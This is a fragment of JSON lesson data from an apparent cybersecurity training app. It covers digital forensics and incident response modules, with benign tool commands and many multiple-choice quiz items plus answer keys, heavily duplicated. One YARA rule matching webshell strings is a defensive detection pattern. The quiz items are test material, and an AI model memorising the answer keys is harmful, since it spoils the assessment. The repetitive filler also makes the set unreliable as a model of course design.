Lifecycle","diff":1,"xp":100,"intro":"NIST incident response.","sections":[{"type":"text","content":"NIST incident response."},{"type":"code","lang":"bash","content":"# 1.Preparation 2.Detection 3.Containment 4.Post-Incident"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"First IR phase?","opts":["Eradication","Preparation","Detection","Recovery"],"ans":1},{"type":"quiz","q":"Chain of custody proves...","opts":["The suspect is guilty","Evidence integrity was maintained","The investigation is complete","Tools were updated"],"ans":1},{"type":"quiz","q":"Volatility analyzes...","opts":["Network traffic","Memory dumps","Disk images","Log files"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Malware sandboxing means...","opts":["Deleting malware","Running it in an isolated environment to observe behavior","Encrypting it","Reverse engineering"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"timeline","cat":"Forensics & IR","title":"Timeline Analysis","diff":2,"xp":150,"intro":"Forensic timelines.","sections":[{"type":"text","content":"Forensic timelines."},{"type":"code","lang":"bash","content":"log2timeline.py timeline.plaso disk.img\nmactime -b bodyfile.txt > timeline.txt"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Super-timeline tool?","opts":["Autopsy","log2timeline (plaso)","Volatility","Wireshark"],"ans":1},{"type":"quiz","q":"The most volatile evidence type is...","opts":["Disk files","RAM contents","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Volatile evidence should be collected...","opts":["Last","First (before it disappears)","Never","After the investigation"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"file-carve","cat":"Forensics & IR","title":"File Carving","diff":1,"xp":100,"intro":"Recover deleted files.","sections":[{"type":"text","content":"Recover deleted files."},{"type":"code","lang":"bash","content":"foremost -i disk.img -o output/\nphotorec disk.img"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"File carving is?","opts":["Encrypting","Recovering via headers, ignoring filesystem","Compressing","Copying"],"ans":1},{"type":"quiz","q":"A disk image should be...","opts":["Compressed","A bit-for-bit exact copy","Encrypted","Partial"],"ans":1},{"type":"quiz","q":"Chain of custody proves...","opts":["The suspect is guilty","Evidence integrity was maintained","The investigation is complete","Tools were updated"],"ans":1},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"stego","cat":"Forensics & IR","title":"Steganography Detection","diff":2,"xp":150,"intro":"Find hidden data.","sections":[{"type":"text","content":"Find hidden data."},{"type":"code","lang":"bash","content":"steghide extract -sf image.jpg\nbinwalk image.png\nzsteg image.png"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Steganography is?","opts":["Encryption","Hiding data within files","Compression","Hashing"],"ans":1},{"type":"quiz","q":"Volatility analyzes...","opts":["Network traffic","Memory dumps","Disk images","Log files"],"ans":1},{"type":"quiz","q":"The most volatile evidence type is...","opts":["Disk files","RAM contents","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Malware sandboxing means...","opts":["Deleting malware","Running it in an isolated environment to observe behavior","Encrypting it","Reverse engineering"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"chain-custody","cat":"Forensics & IR","title":"Chain of Custody","diff":1,"xp":75,"intro":"Evidence integrity.","sections":[{"type":"text","content":"Evidence integrity."},{"type":"code","lang":"bash","content":"sha256sum evidence.img\n# Document: who, when, how, access log"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Why important?","opts":["Speed","Evidence admissible in court","Compression","Encryption"],"ans":1},{"type":"quiz","q":"Volatile evidence should be collected...","opts":["Last","First (before it disappears)","Never","After the investigation"],"ans":1},{"type":"quiz","q":"A disk image should be...","opts":["Compressed","A bit-for-bit exact copy","Encrypted","Partial"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"yara-rules","cat":"Forensics & IR","title":"YARA Rules","diff":2,"xp":150,"intro":"Pattern-matching detection.","sections":[{"type":"text","content":"Pattern-matching detection."},{"type":"code","lang":"bash","content":"rule webshell {\n  strings: $s1=\"system(\" $s2=\"eval(\"\n  condition: 2 of ($s*)\n}\nyara rule.yar suspicious_file"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"YARA matches?","opts":["Network","Byte patterns and strings","DNS","Registry"],"ans":1},{"type":"quiz","q":"Chain of custody proves...","opts":["The suspect is guilty","Evidence integrity was maintained","The investigation is complete","Tools were updated"],"ans":1},{"type":"quiz","q":"Volatility analyzes...","opts":["Network traffic","Memory dumps","Disk images","Log files"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"vol-advanced","cat":"Forensics & IR","title":"Volatility Advanced","diff":3,"xp":200,"intro":"Specialized plugins.","sections":[{"type":"text","content":"Specialized plugins."},{"type":"code","lang":"bash","content":"vol3 -f mem.dmp windows.malfind\nvol3 -f mem.dmp windows.cmdscan"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Injected code plugin?","opts":["pslist","malfind","netscan","hashdump"],"ans":1},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Malware sandboxing means...","opts":["Deleting malware","Running it in an isolated environment to observe behavior","Encrypting it","Reverse engineering"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"win-artifacts","cat":"Forensics & IR","title":"Windows Artifacts","diff":2,"xp":150,"intro":"Key forensic artifacts.","sections":[{"type":"text","content":"Key forensic artifacts."},{"type":"code","lang":"bash","content":"# Prefetch: C:WindowsPrefetch*.pf\n# Amcache: program execution\n# USN Journal: filesystem changes"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Execution evidence?","opts":["Registry","Prefetch files","Hosts","Shortcuts"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"linux-artifacts","cat":"Forensics & IR","title":"Linux Artifacts","diff":2,"xp":150,"intro":"Key forensic artifacts.","sections":[{"type":"text","content":"Key forensic artifacts."},{"type":"code","lang":"bash","content":"~/.bash_history\n/var/log/auth.log\n/etc/crontab"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Auth attempts log?","opts":["~/.bash_history","/var/log/auth.log","/etc/passwd","/etc/shadow"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT 